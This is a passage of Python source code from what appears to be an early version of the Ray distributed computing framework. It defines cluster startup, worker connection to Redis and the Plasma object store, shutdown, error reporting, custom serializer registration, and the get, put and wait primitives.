num_local_schedulers (int): The number of local schedulers to start.
This is only provided if start_ray_local is True.
object_store_memory: The amount of memory (in bytes) to start the
object store with.
driver_mode (bool): The mode in which to start the driver. This should
be one of ray.SCRIPT_MODE, ray.LOCAL_MODE, and ray.SILENT_MODE.
redirect_worker_output: True if the stdout and stderr of worker
processes should be redirected to files.
redirect_output (bool): True if stdout and stderr for non-worker
processes should be redirected to files and false otherwise.
start_workers_from_local_scheduler (bool): If this flag is True, then
start the initial workers from the local scheduler. Else, start
them from Python. The latter case is for debugging purposes only.
num_cpus (int): Number of cpus the user wishes all local schedulers to
be configured with.
num_gpus (int): Number of gpus the user wishes all local schedulers to
be configured with. If unspecified, Ray will attempt to autodetect
the number of GPUs available on the node (note that autodetection
currently only works for Nvidia GPUs).
resources: A dictionary mapping resource names to the quantity of that
resource available.
num_redis_shards: The number of Redis shards to start in addition to
the primary Redis shard.
redis_max_clients: If provided, attempt to configure Redis with this
maxclients number.
plasma_directory: A directory where the Plasma memory mapped files will
be created.
huge_pages: Boolean flag indicating whether to start the Object
Store with hugetlbfs support. Requires plasma_directory.
include_webui: Boolean flag indicating whether to start the web
UI, which is a Jupyter notebook.
use_raylet: True if the new raylet code path should be used.
Returns:
Address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
check_main_thread()
if driver_mode not in [SCRIPT_MODE, LOCAL_MODE, SILENT_MODE]:
raise Exception("Driver_mode must be in [ray.SCRIPT_MODE, "
"ray.LOCAL_MODE, ray.SILENT_MODE].")
if use_raylet is None and os.environ.get("RAY_USE_XRAY") == "1":
# This environment variable is used in our testing setup.
logger.info("Detected environment variable 'RAY_USE_XRAY'.")
use_raylet = True
# Get addresses of existing services.
if address_info is None:
address_info = {}
else:
assert isinstance(address_info, dict)
node_ip_address = address_info.get("node_ip_address")
redis_address = address_info.get("redis_address")
# Start any services that do not yet exist.
if driver_mode == LOCAL_MODE:
# If starting Ray in LOCAL_MODE, don't start any other processes.
pass
elif start_ray_local:
# In this case, we launch a scheduler, a new object store, and some
# workers, and we connect to them. We do not launch any processes that
# are already registered in address_info.
if node_ip_address is None:
node_ip_address = ray.services.get_node_ip_address()
# Use 1 local scheduler if num_local_schedulers is not provided. If
# existing local schedulers are provided, use that count as
# num_local_schedulers.
local_schedulers = address_info.get("local_scheduler_socket_names", [])
if num_local_schedulers is None:
if len(local_schedulers) > 0:
num_local_schedulers = len(local_schedulers)
else:
num_local_schedulers = 1
# Use 1 additional redis shard if num_redis_shards is not provided.
num_redis_shards = 1 if num_redis_shards is None else num_redis_shards
# Stick the CPU and GPU resources into the resource dictionary.
resources = _normalize_resource_arguments(
num_cpus, num_gpus, resources, num_local_schedulers)
# Start the scheduler, object store, and some workers. These will be
# killed by the call to shutdown(), which happens when the Python
# script exits.
address_info = services.start_ray_head(
address_info=address_info,
node_ip_address=node_ip_address,
num_workers=num_workers,
num_local_schedulers=num_local_schedulers,
object_store_memory=object_store_memory,
redirect_worker_output=redirect_worker_output,
redirect_output=redirect_output,
start_workers_from_local_scheduler=(
start_workers_from_local_scheduler),
resources=resources,
num_redis_shards=num_redis_shards,
redis_max_clients=redis_max_clients,
plasma_directory=plasma_directory,
huge_pages=huge_pages,
include_webui=include_webui,
use_raylet=use_raylet)
else:
if redis_address is None:
raise Exception("When connecting to an existing cluster, "
"redis_address must be provided.")
if num_workers is not None:
raise Exception("When connecting to an existing cluster, "
"num_workers must not be provided.")
if num_local_schedulers is not None:
raise Exception("When connecting to an existing cluster, "
"num_local_schedulers must not be provided.")
if num_cpus is not None or num_gpus is not None:
raise Exception("When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise Exception("When connecting to an existing cluster, "
"resources must not be provided.")
if num_redis_shards is not None:
raise Exception("When connecting to an existing cluster, "
"num_redis_shards must not be provided.")
if redis_max_clients is not None:
raise Exception("When connecting to an existing cluster, "
"redis_max_clients must not be provided.")
if object_store_memory is not None:
raise Exception("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if plasma_directory is not None:
raise Exception("When connecting to an existing cluster, "
"plasma_directory must not be provided.")
if huge_pages:
raise Exception("When connecting to an existing cluster, "
"huge_pages must not be provided.")
# Get the node IP address if one is not provided.
if node_ip_address is None:
node_ip_address = services.get_node_ip_address(redis_address)
# Get the address info of the processes to connect to from Redis.
address_info = get_address_info_from_redis(
redis_address, node_ip_address, use_raylet=use_raylet)
# Connect this driver to Redis, the object store, and the local scheduler.
# Choose the first object store and local scheduler if there are multiple.
# The corresponding call to disconnect will happen in the call to
# shutdown() when the Python script exits.
if driver_mode == LOCAL_MODE:
driver_address_info = {}
else:
driver_address_info = {
"node_ip_address": node_ip_address,
"redis_address": address_info["redis_address"],
"store_socket_name": (
address_info["object_store_addresses"][0].name),
"webui_url": address_info["webui_url"]
}
if not use_raylet:
driver_address_info["manager_socket_name"] = (
address_info["object_store_addresses"][0].manager_name)
driver_address_info["local_scheduler_socket_name"] = (
address_info["local_scheduler_socket_names"][0])
else:
driver_address_info["raylet_socket_name"] = (
address_info["raylet_socket_names"][0])
connect(
driver_address_info,
object_id_seed=object_id_seed,
mode=driver_mode,
worker=global_worker,
use_raylet=use_raylet)
return address_info
def init(redis_address=None,
num_cpus=None,
num_gpus=None,
resources=None,
object_store_memory=None,
node_ip_address=None,
object_id_seed=None,
num_workers=None,
driver_mode=SCRIPT_MODE,
redirect_worker_output=False,
redirect_output=True,
ignore_reinit_error=False,
num_custom_resource=None,
num_redis_shards=None,
redis_max_clients=None,
plasma_directory=None,
huge_pages=False,
include_webui=True,
use_raylet=None):
"""Connect to an existing Ray cluster or start one and connect to it.
This method handles two cases. Either a Ray cluster already exists and we
just attach this driver to it, or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
To start Ray and all of the relevant processes, use this as follows:
.. code-block:: python
ray.init()
To connect to an existing Ray cluster, use this as follows (substituting
in the appropriate address):
.. code-block:: python
ray.init(redis_address="123.45.67.89:6379")
Args:
redis_address (str): The address of the Redis server to connect to. If
this address is not provided, then this command will start Redis, a
global scheduler, a local scheduler, a plasma store, a plasma
manager, and some workers. It will also kill these processes when
Python exits.
num_cpus (int): Number of cpus the user wishes all local schedulers to
be configured with.
num_gpus (int): Number of gpus the user wishes all local schedulers to
be configured with.
resources: A dictionary mapping the name of a resource to the quantity
of that resource available.
object_store_memory: The amount of memory (in bytes) to start the
object store with.
node_ip_address (str): The IP address of the node that we are on.
object_id_seed (int): Used to seed the deterministic generation of
object IDs. The same value can be used across multiple runs of the
same job in order to generate the object IDs in a consistent
manner. However, the same ID should not be used for different jobs.
num_workers (int): The number of workers to start. This is only
provided if redis_address is not provided.
driver_mode (bool): The mode in which to start the driver. This should
be one of ray.SCRIPT_MODE, ray.LOCAL_MODE, and ray.SILENT_MODE.
redirect_worker_output: True if the stdout and stderr of worker
processes should be redirected to files.
redirect_output (bool): True if stdout and stderr for non-worker
processes should be redirected to files and false otherwise.
ignore_reinit_error: True if we should suppress errors from calling
ray.init() a second time.
num_redis_shards: The number of Redis shards to start in addition to
the primary Redis shard.
redis_max_clients: If provided, attempt to configure Redis with this
maxclients number.
plasma_directory: A directory where the Plasma memory mapped files will
be created.
huge_pages: Boolean flag indicating whether to start the Object
Store with hugetlbfs support. Requires plasma_directory.
include_webui: Boolean flag indicating whether to start the web
UI, which is a Jupyter notebook.
use_raylet: True if the new raylet code path should be used.
Returns:
Address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
if global_worker.connected:
if ignore_reinit_error:
logger.error("Calling ray.init() again after it has already been "
"called.")
return
else:
raise Exception("Perhaps you called ray.init twice by accident?")
if use_raylet is None and os.environ.get("RAY_USE_XRAY") == "1":
# This environment variable is used in our testing setup.
logger.info("Detected environment variable 'RAY_USE_XRAY'.")
use_raylet = True
# Convert hostnames to numerical IP address.
if node_ip_address is not None:
node_ip_address = services.address_to_ip(node_ip_address)
if redis_address is not None:
redis_address = services.address_to_ip(redis_address)
info = {"node_ip_address": node_ip_address, "redis_address": redis_address}
ret = _init(
address_info=info,
start_ray_local=(redis_address is None),
num_workers=num_workers,
driver_mode=driver_mode,
redirect_worker_output=redirect_worker_output,
redirect_output=redirect_output,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
num_redis_shards=num_redis_shards,
redis_max_clients=redis_max_clients,
plasma_directory=plasma_directory,
huge_pages=huge_pages,
include_webui=include_webui,
object_store_memory=object_store_memory,
use_raylet=use_raylet)
for hook in _post_init_hooks:
hook()
return ret
# Functions to run as callback after a successful ray init
_post_init_hooks = []
def cleanup(worker=global_worker):
raise DeprecationWarning(
"The function ray.worker.cleanup() has been deprecated. Instead, "
"please call ray.shutdown().")
def shutdown(worker=global_worker):
"""Disconnect the worker, and terminate processes started by ray.init().
This will automatically run at the end when a Python process that uses Ray
exits. It is ok to run this twice in a row. The primary use case for this
function is to cleanup state between tests.
Note that this will clear any remote function definitions, actor
definitions, and existing actors, so if you wish to use any previously
defined remote functions or actors after calling ray.shutdown(), then you
need to redefine them. If they were defined in an imported module, then you
will need to reload the module.
"""
disconnect(worker)
if hasattr(worker, "local_scheduler_client"):
del worker.local_scheduler_client
if hasattr(worker, "plasma_client"):
worker.plasma_client.disconnect()
if worker.mode in [SCRIPT_MODE, SILENT_MODE]:
# If this is a driver, push the finish time to Redis and clean up any
# other services that were started with the driver.
worker.redis_client.hmset(b"Drivers:" + worker.worker_id,
{"end_time": time.time()})
services.cleanup()
else:
# If this is not a driver, make sure there are no orphan processes,
# besides possibly the worker itself.
for process_type, processes in services.all_processes.items():
if process_type == services.PROCESS_TYPE_WORKER:
assert (len(processes)) <= 1
else:
assert (len(processes) == 0)
worker.set_mode(None)
atexit.register(shutdown)
# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(type, value, tb):
# If this is a driver, push the exception to redis.
if global_worker.mode in [SCRIPT_MODE, SILENT_MODE]:
error_message = "".join(traceback.format_tb(tb))
global_worker.redis_client.hmset(b"Drivers:" + global_worker.worker_id,
{"exception": error_message})
# Call the normal excepthook.
normal_excepthook(type, value, tb)
sys.excepthook = custom_excepthook
def print_error_messages_raylet(worker):
"""Print error messages in the background on the driver.
This runs in a separate thread on the driver and prints error messages in
the background.
"""
if not worker.use_raylet:
raise Exception("This function is specific to the raylet code path.")
worker.error_message_pubsub_client = worker.redis_client.pubsub(
ignore_subscribe_messages=True)
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
# Really we should just subscribe to the errors for this specific job.
# However, currently all errors seem to be published on the same channel.
error_pubsub_channel = str(
ray.gcs_utils.TablePubsub.ERROR_INFO).encode("ascii")
worker.error_message_pubsub_client.subscribe(error_pubsub_channel)
# worker.error_message_pubsub_client.psubscribe("*")
# Keep a set of all the error messages that we've seen so far in order to
# avoid printing the same error message repeatedly. This is especially
# important when running a script inside of a tool like screen where
# scrolling is difficult.
old_error_messages = set()
# Get the exports that occurred before the call to subscribe.
with worker.lock:
error_messages = global_state.error_messages(worker.task_driver_id)
for error_message in error_messages:
if error_message not in old_error_messages:
logger.error(error_message)
old_error_messages.add(error_message)
else:
logger.error("Suppressing duplicate error message.")
try:
for msg in worker.error_message_pubsub_client.listen():
gcs_entry = ray.gcs_utils.GcsTableEntry.GetRootAsGcsTableEntry(
msg["data"], 0)
assert gcs_entry.EntriesLength() == 1
error_data = ray.gcs_utils.ErrorTableData.GetRootAsErrorTableData(
gcs_entry.Entries(0), 0)
NIL_JOB_ID = 20 * b"\x00"
job_id = error_data.JobId()
if job_id not in [worker.task_driver_id.id(), NIL_JOB_ID]:
continue
error_message = ray.utils.decode(error_data.ErrorMessage())
if error_message not in old_error_messages:
logger.error(error_message)
old_error_messages.add(error_message)
else:
logger.error("Suppressing duplicate error message.")
except redis.ConnectionError:
# When Redis terminates the listen call will throw a ConnectionError,
# which we catch here.
pass
def print_error_messages(worker):
"""Print error messages in the background on the driver.
This runs in a separate thread on the driver and prints error messages in
the background.
"""
# TODO(rkn): All error messages should have a "component" field indicating
# which process the error came from (e.g., a worker or a plasma store).
# Currently all error messages come from workers.
worker.error_message_pubsub_client = worker.redis_client.pubsub()
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
worker.error_message_pubsub_client.subscribe("__keyspace@0__:ErrorKeys")
num_errors_received = 0
# Keep a set of all the error messages that we've seen so far in order to
# avoid printing the same error message repeatedly. This is especially
# important when running a script inside of a tool like screen where
# scrolling is difficult.
old_error_messages = set()
# Get the exports that occurred before the call to subscribe.
with worker.lock:
error_keys = worker.redis_client.lrange("ErrorKeys", 0, -1)
for error_key in error_keys:
if error_applies_to_driver(error_key, worker=worker):
error_message = ray.utils.decode(
worker.redis_client.hget(error_key, "message"))
if error_message not in old_error_messages:
logger.error(error_message)
old_error_messages.add(error_message)
else:
logger.error("Suppressing duplicate error message.")
num_errors_received += 1
try:
for msg in worker.error_message_pubsub_client.listen():
with worker.lock:
for error_key in worker.redis_client.lrange(
"ErrorKeys", num_errors_received, -1):
if error_applies_to_driver(error_key, worker=worker):
error_message = ray.utils.decode(
worker.redis_client.hget(error_key, "message"))
if error_message not in old_error_messages:
logger.error(error_message)
old_error_messages.add(error_message)
else:
logger.error(
"Suppressing duplicate error message.")
num_errors_received += 1
except redis.ConnectionError:
# When Redis terminates the listen call will throw a ConnectionError,
# which we catch here.
pass
def connect(info,
object_id_seed=None,
mode=WORKER_MODE,
worker=global_worker,
use_raylet=False):
"""Connect this worker to the local scheduler, to Plasma, and to Redis.
Args:
info (dict): A dictionary with address of the Redis server and the
sockets of the plasma store, plasma manager, and local scheduler.
object_id_seed: A seed to use to make the generation of object IDs
deterministic.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE,
LOCAL_MODE, and SILENT_MODE.
use_raylet: True if the new raylet code path should be used.
"""
check_main_thread()
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
assert worker.cached_functions_to_run is not None, error_message
assert worker.cached_remote_functions_and_actors is not None, error_message
# Initialize some fields.
worker.worker_id = random_string()
# When tasks are executed on remote workers in the context of multiple
# drivers, the task driver ID is used to keep track of which driver is
# responsible for the task so that error messages will be propagated to
# the correct driver.
if mode != WORKER_MODE:
worker.task_driver_id = ray.ObjectID(worker.worker_id)
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.actor_id = NIL_ACTOR_ID
worker.connected = True
worker.set_mode(mode)
worker.use_raylet = use_raylet
# If running Ray in LOCAL_MODE, there is no need to create call
# create_worker or to start the worker service.
if mode == LOCAL_MODE:
return
# Set the node IP address.
worker.node_ip_address = info["node_ip_address"]
worker.redis_address = info["redis_address"]
# Create a Redis client.
redis_ip_address, redis_port = info["redis_address"].split(":")
worker.redis_client = redis.StrictRedis(
host=redis_ip_address, port=int(redis_port))
# For driver's check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray.services.check_version_info(worker.redis_client)
except Exception as e:
if mode in [SCRIPT_MODE, SILENT_MODE]:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray.utils.push_error_to_driver_through_redis(
worker.redis_client,
worker.use_raylet,
ray_constants.VERSION_MISMATCH_PUSH_ERROR,
traceback_str,
driver_id=None)
worker.lock = threading.Lock()
# Check the RedirectOutput key in Redis and based on its value redirect
# worker output and error to their own files.
if mode == WORKER_MODE:
# This key is set in services.py when Redis is started.
redirect_worker_output_val = worker.redis_client.get("RedirectOutput")
if (redirect_worker_output_val is not None
and int(redirect_worker_output_val) == 1):
redirect_worker_output = 1
else:
redirect_worker_output = 0
if redirect_worker_output:
log_stdout_file, log_stderr_file = services.new_log_files(
"worker", True)
sys.stdout = log_stdout_file
sys.stderr = log_stderr_file
services.record_log_files_in_redis(
info["redis_address"], info["node_ip_address"],
[log_stdout_file, log_stderr_file])
# Create an object for interfacing with the global state.
global_state._initialize_global_state(redis_ip_address, int(redis_port))
# Register the worker with Redis.
if mode in [SCRIPT_MODE, SILENT_MODE]:
# The concept of a driver is the same as the concept of a "job".
# Register the driver/job with Redis here.
import __main__ as main
driver_info = {
"node_ip_address": worker.node_ip_address,
"driver_id": worker.worker_id,
"start_time": time.time(),
"plasma_store_socket": info["store_socket_name"],
"plasma_manager_socket": info.get("manager_socket_name"),
"local_scheduler_socket": info.get("local_scheduler_socket_name"),
"raylet_socket": info.get("raylet_socket_name")
}
driver_info["name"] = (main.__file__ if hasattr(main, "__file__") else
"INTERACTIVE MODE")
worker.redis_client.hmset(b"Drivers:" + worker.worker_id, driver_info)
if not worker.redis_client.exists("webui"):
worker.redis_client.hmset("webui", {"url": info["webui_url"]})
is_worker = False
elif mode == WORKER_MODE:
# Register the worker with Redis.
worker_dict = {
"node_ip_address": worker.node_ip_address,
"plasma_store_socket": info["store_socket_name"],
"plasma_manager_socket": info["manager_socket_name"],
"local_scheduler_socket": info["local_scheduler_socket_name"]
}
if redirect_worker_output:
worker_dict["stdout_file"] = os.path.abspath(log_stdout_file.name)
worker_dict["stderr_file"] = os.path.abspath(log_stderr_file.name)
worker.redis_client.hmset(b"Workers:" + worker.worker_id, worker_dict)
is_worker = True
else:
raise Exception("This code should be unreachable.")
# Create an object store client.
if not worker.use_raylet:
worker.plasma_client = plasma.connect(info["store_socket_name"],
info["manager_socket_name"], 64)
else:
worker.plasma_client = plasma.connect(info["store_socket_name"], "",
64)
if not worker.use_raylet:
local_scheduler_socket = info["local_scheduler_socket_name"]
else:
local_scheduler_socket = info["raylet_socket_name"]
worker.local_scheduler_client = ray.local_scheduler.LocalSchedulerClient(
local_scheduler_socket, worker.worker_id, is_worker, worker.use_raylet)
# If this is a driver, set the current task ID, the task driver ID, and set
# the task index to 0.
if mode in [SCRIPT_MODE, SILENT_MODE]:
# If the user provided an object_id_seed, then set the current task ID
# deterministically based on that seed (without altering the state of
# the user's random number generator). Otherwise, set the current task
# ID randomly to avoid object ID collisions.
numpy_state = np.random.get_state()
if object_id_seed is not None:
np.random.seed(object_id_seed)
else:
# Try to use true randomness.
np.random.seed(None)
worker.current_task_id = ray.ObjectID(np.random.bytes(20))
# Reset the state of the numpy random number generator.
np.random.set_state(numpy_state)
# Set other fields needed for computing task IDs.
worker.task_index = 0
worker.put_index = 1
# Create an entry for the driver task in the task table. This task is
# added immediately with status RUNNING. This allows us to push errors
# related to this driver task back to the driver. For example, if the
# driver creates an object that is later evicted, we should notify the
# user that we're unable to reconstruct the object, since we cannot
# rerun the driver.
nil_actor_counter = 0
driver_task = ray.local_scheduler.Task(
worker.task_driver_id, ray.ObjectID(NIL_FUNCTION_ID), [], 0,
worker.current_task_id, worker.task_index,
ray.ObjectID(NIL_ACTOR_ID), ray.ObjectID(NIL_ACTOR_ID),
ray.ObjectID(NIL_ACTOR_ID), ray.ObjectID(NIL_ACTOR_ID),
nil_actor_counter, False, [], {"CPU": 0}, worker.use_raylet)
# Add the driver task to the task table.
if not worker.use_raylet:
global_state._execute_command(
driver_task.task_id(), "RAY.TASK_TABLE_ADD",
driver_task.task_id().id(), TASK_STATUS_RUNNING,
NIL_LOCAL_SCHEDULER_ID,
driver_task.execution_dependencies_string(), 0,
ray.local_scheduler.task_to_string(driver_task))
else:
global_state._execute_command(
driver_task.task_id(), "RAY.TABLE_ADD",
ray.gcs_utils.TablePrefix.RAYLET_TASK,
ray.gcs_utils.TablePubsub.RAYLET_TASK,
driver_task.task_id().id(),
driver_task._serialized_raylet_task())
# Set the driver's current task ID to the task ID assigned to the
# driver task.
worker.current_task_id = driver_task.task_id()
# Initialize the serialization library. This registers some classes, and so
# it must be run before we export all of the cached remote functions.
_initialize_serialization()
# Start the import thread
import_thread.ImportThread(worker, mode).start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
# trying to properly shutdown the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
if not worker.use_raylet:
t = threading.Thread(target=print_error_messages, args=(worker, ))
else:
t = threading.Thread(
target=print_error_messages_raylet, args=(worker, ))
# Making the thread a daemon causes it to exit when the main thread
# exits.
t.daemon = True
t.start()
if mode in [SCRIPT_MODE, SILENT_MODE] and worker.use_raylet:
worker.profiler.start_flush_thread()
if mode in [SCRIPT_MODE, SILENT_MODE]:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the clusters
# are the same.
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
# Export cached remote functions to the workers.
for cached_type, info in worker.cached_remote_functions_and_actors:
if cached_type == "remote_function":
info._export()
elif cached_type == "actor":
(key, actor_class_info) = info
ray.actor.publish_actor_class_to_key(key, actor_class_info,
worker)
else:
assert False, "This code should be unreachable."
worker.cached_functions_to_run = None
worker.cached_remote_functions_and_actors = None
def disconnect(worker=global_worker):
"""Disconnect this worker from the scheduler and object store."""
# Reset the list of cached remote functions and actors so that if more
# remote functions or actors are defined and then connect is called again,
# the remote functions will be exported. This is mostly relevant for the
# tests.
worker.connected = False
worker.cached_functions_to_run = []
worker.cached_remote_functions_and_actors = []
worker.serialization_context = pyarrow.SerializationContext()
def _try_to_compute_deterministic_class_id(cls, depth=5):
"""Attempt to produce a deterministic class ID for a given class.
The goal here is for the class ID to be the same when this is run on
different worker processes. Pickling, loading, and pickling again seems to
produce more consistent results than simply pickling. This is a bit crazy
and could cause problems, in which case we should revert it and figure out
something better.
Args:
cls: The class to produce an ID for.
depth: The number of times to repeatedly try to load and dump the
string while trying to reach a fixed point.
Returns:
A class ID for this class. We attempt to make the class ID the same
when this function is run on different workers, but that is not
guaranteed.
Raises:
Exception: This could raise an exception if cloudpickle raises an
exception.
"""
# Pickling, loading, and pickling again seems to produce more consistent
# results than simply pickling. This is a bit
class_id = pickle.dumps(cls)
for _ in range(depth):
new_class_id = pickle.dumps(pickle.loads(class_id))
if new_class_id == class_id:
# We appear to have reached a fix point, so use this as the ID.
return hashlib.sha1(new_class_id).digest()
class_id = new_class_id
# We have not reached a fixed point, so we may end up with a different
# class ID for this custom class on each worker, which could lead to the
# same class definition being exported many many times.
logger.warning(
"WARNING: Could not produce a deterministic class ID for class "
"{}".format(cls))
return hashlib.sha1(new_class_id).digest()
def register_custom_serializer(cls,
use_pickle=False,
use_dict=False,
serializer=None,
deserializer=None,
local=False,
worker=global_worker):
"""Enable serialization and deserialization for a particular class.
This method runs the register_class function defined below on every worker,
which will enable ray to properly serialize and deserialize objects of
this class.
Args:
cls (type): The class that ray should use this custom serializer for.
use_pickle (bool): If true, then objects of this class will be
serialized using pickle.
use_dict: If true, then objects of this class be serialized turning
their __dict__ fields into a dictionary. Must be False if
use_pickle is true.
serializer: The custom serializer to use. This should be provided if
and only if use_pickle and use_dict are False.
deserializer: The custom deserializer to use. This should be provided
if and only if use_pickle and use_dict are False.
local: True if the serializers should only be registered on the current
worker. This should usually be False.
Raises:
Exception: An exception is raised if pickle=False and the class cannot
be efficiently serialized by Ray. This can also raise an exception
if use_dict is true and cls is not pickleable.
"""
assert (serializer is None) == (deserializer is None), (
"The serializer/deserializer arguments must both be provided or "
"both not be provided.")
use_custom_serializer = (serializer is not None)
assert use_custom_serializer + use_pickle + use_dict == 1, (
"Exactly one of use_pickle, use_dict, or serializer/deserializer must "
"be specified.")
if use_dict:
# Raise an exception if cls cannot be serialized efficiently by Ray.
serialization.check_serializable(cls)
if not local:
# In this case, the class ID will be used to deduplicate the class
# across workers. Note that cloudpickle unfortunately does not produce
# deterministic strings, so these IDs could be different on different
# workers. We could use something weaker like cls.__name__, however
# that would run the risk of having collisions. TODO(rkn): We should
# improve this.
try:
# Attempt to produce a class ID that will be the same on each
# worker. However, determinism is not guaranteed, and the result
# may be different on different workers.
class_id = _try_to_compute_deterministic_class_id(cls)
except Exception as e:
raise serialization.CloudPickleError("Failed to pickle class "
"'{}'".format(cls))
else:
# In this case, the class ID only needs to be meaningful on this worker
# and not across workers.
class_id = random_string()
def register_class_for_serialization(worker_info):
# TODO(rkn): We need to be more thoughtful about what to do if custom
# serializers have already been registered for class_id. In some cases,
# we may want to use the last user-defined serializers and ignore
# subsequent calls to register_custom_serializer that were made by the
# system.
worker_info["worker"].serialization_context.register_type(
cls,
class_id,
pickle=use_pickle,
custom_serializer=serializer,
custom_deserializer=deserializer)
if not local:
worker.run_function_on_all_workers(register_class_for_serialization)
else:
# Since we are pickling objects of this class, we don't actually need
# to ship the class definition.
register_class_for_serialization({"worker": worker})
def get(object_ids, worker=global_worker):
"""Get a remote object or a list of remote objects from the object store.
This method blocks until the object corresponding to the object ID is
available in the local object store. If this object is not in the local
object store, it will be shipped from an object store that has it (once the
object has been created). If object_ids is a list, then the objects
corresponding to each object in the list will be returned.
Args:
object_ids: Object ID of the object to get or a list of object IDs to
get.
Returns:
A Python object or a list of Python objects.
Raises:
Exception: An exception is raised if the task that created the object
or that created one of the objects raised an exception.
"""
worker.check_connected()
with profiling.profile("ray.get", worker=worker):
check_main_thread()
if worker.mode == LOCAL_MODE:
# In LOCAL_MODE, ray.get is the identity operation (the input will
# actually be a value not an objectid).
return object_ids
if isinstance(object_ids, list):
values = worker.get_object(object_ids)
for i, value in enumerate(values):
if isinstance(value, RayTaskError):
raise RayGetError(object_ids[i], value)
return values
else:
value = worker.get_object([object_ids])[0]
if isinstance(value, RayTaskError):
# If the result is a RayTaskError, then the task that created
# this object failed, and we should propagate the error message
# here.
raise RayGetError(object_ids, value)
return value
def put(value, worker=global_worker):
"""Store an object in the object store.
Args:
value: The Python object to be stored.
Returns:
The object ID assigned to this value.
"""
worker.check_connected()
with profiling.profile("ray.put", worker=worker):
check_main_thread()
if worker.mode == LOCAL_MODE:
# In LOCAL_MODE, ray.put is the identity operation.
return value
object_id = worker.local_scheduler_client.compute_put_id(
worker.current_task_id, worker.put_index, worker.use_raylet)
worker.put_object(object_id, value)
worker.put_index += 1
return object_id
def wait(object_ids, num_returns=1, timeout=None, worker=global_worker):
"""Return a list of IDs that are ready and a list of IDs that are not.
If timeout is set, the function returns either when the requested number of
IDs are ready or when the timeout is reached, whichever occurs first. If it
is not set, the function simply waits until that number of objects is ready
and returns that exact number of object IDs.
This method returns two lists. The first list consists of object IDs that
correspond to objects that are available in the object store. The second
list corresponds to the rest of the object IDs (which may or may not be
ready).
Ordering of the input list of object IDs is preserved. That is, if A
precedes B in the input list, and both are in the ready list, then A will
precede B in the ready list. This also holds true if A and B are both in
the remaining list.
Args:
object_ids (List[ObjectID]): List of object IDs for objects that may or
may not be ready. Note that these IDs must be unique.
num_returns (int): The number of object IDs that should be returned.
timeout (int): The maximum amount of time in milliseconds to wait
before returning.
Returns:
A list of object IDs that are ready and a list of the remaining object
IDs.
"""
if isinstance(object_ids, ray.ObjectID):
raise TypeError(
"wait() expected a list of ObjectID, got a single ObjectID")
if not isinstance(object_ids, list):
raise TypeError("wait() expected a list of ObjectID, got {}".format(
type(object_ids)))
if worker.mode != LOCAL_MODE:
for object_id in object_ids:
if not isinstance(object_id, ray.ObjectID):
raise TypeError("wait() expected a list of ObjectID, "
"got list containing {}".format(
type(object_id)))
worker.check_connected()
with profiling.profile("ray.wait", worker=worker):
check_main_thread()
# When Ray is run in LOCAL_MODE, all functions are run immediately,
# so all objects in object_id are ready.
if worker.mode == LOCAL_MODE:
return object_ids[:num_returns], object_ids[num_returns:]
# TODO(rkn): This is a temporary workaround for
# https://github.com/ray-project/ray/issues/997. However, it should be
# fixed in Arrow instead of here.
if len(object_ids) == 0:
return [], []
if len(object_ids) != len(set(object_ids)):
raise Exception("Wait requires a list of unique object IDs.")
if num_returns <= 0:
raise Exception(
"Invalid number of objects to return %d." % num_returns)
if num_returns > len(object_ids):
raise Exception("num_returns cannot be greater than the number "
"of objects provided to ray.wait.")
timeout = timeout if timeout is not None else 2**30
if worker.use_raylet:
ready_ids, remaining_ids = worker.local_scheduler_client.wait(
object_ids, num_returns, timeout, False)
else:
object_id_strs = [
plasma.ObjectID(object_id.id()) for object_id in object_ids
]
ready_ids, remaining_ids = worker.plasma_client.wait(
object_id_strs, timeout, num_returns)
ready_ids = [
ray.ObjectID(object_id.binary()) for object_id in ready_ids
]
remaining_ids = [
ray.ObjectID(object_id.binary()) for object_id in remaining_ids
]
return ready_ids, remaining_ids
def _mode(worker=global_worker):
"""This is a wrapper around worker.mode.
We use this wrapper so that in the remote decorator, we can call _mode()
instead of worker.mode. The difference is that when we attempt to serialize
remote functions, we don't attempt to serialize the worker object, which
cannot be serialized.
"""
return worker.mode
def get_global_worker():
return global_worker
def make_decorator(num_return_vals=None,
num_cpus=None,
num_gpus=None,
resources=None,
max_calls=None,
checkpoint_interval=None,
worker=None):
def decorator(function_or_class):
if (inspect.isfunction(function_or_class)
or is_cython(function_or_class)):
# Set the remote function default resources.
if checkpoint_interval is not None:
